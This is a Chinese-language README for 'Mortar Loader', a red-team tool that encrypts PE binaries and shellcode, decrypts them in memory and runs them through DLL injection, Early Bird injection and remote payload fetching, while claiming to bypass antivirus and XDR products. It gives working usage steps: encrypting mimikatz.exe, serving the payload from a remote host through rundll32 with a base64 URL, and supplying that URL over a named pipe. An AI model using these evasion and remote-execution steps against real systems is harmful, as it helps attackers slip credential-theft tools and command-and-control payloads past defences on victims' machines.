红队规避技术,用于挫败和转移安全产品的检测与防御。Mortar Loader 在内存流中执行 PE/Shellcode 的加密和解密,并利用多种注入技术执行它。
Mortar 能够绕过现代防病毒产品和高级 XDR 解决方案,并已测试并确认绕过以下产品:
新版本(v3)已发布,具备以下功能:
更多技术描述,请参考以下博客文章:https://kpmg.com/nl/en/home/insights/2023/12/mortar-loader.html
加密器对 C ShellCode 和 PE 二进制文件进行加密,并将输出写入 .enc 文件。
您可以使用任何您喜欢的 payload(MSF/cobalt/Havoc 等),只要它是 x64 架构并且不是 RAW 格式。
root@kali>./encryptor -f mimikatz.exe -o bin.enc
root@kali>./encryptor -f shellcode.c -o bin.enc
新版本结合了多种技术与远程 payload 获取,建议参考以下博客文章以获取更多信息。
快速说明:
# PE Forking
1. host your encrypted binary on remote host.
2. encode the final URL with base64.
3. rundll32.exe agressor.dll,viewlogs [BASE64 URL].
4. covert reload subroutine technique is enabled.
目前支持 Early Bird 注入与命名管道结合,以接收用于最终执行的变量。
1. inject Mortar DLL into remote process( DLL injection, Hijacking, sideloading).
2. connect into the named pipe to supply your URL
echo {BASE64 URL} > \\.\pipe\moj_ML_ntsvcs
3. payload will be executed once valid value has been recieved.
该项目使用 FPC(Free Pascal)编码,编译过程简单,下载并安装 Lazarus IDE(https://www.lazarus-ide.org/index.php?page=downloads)即可。
对于加密器,您可以从发布部分下载,或者使用 Lazarus IDE 轻松编译。
#Debian & Ubuntu
apt install fpc
apt install lazarus-ide
Mortar 或任何共享项目的开发都是我个人时间的成果。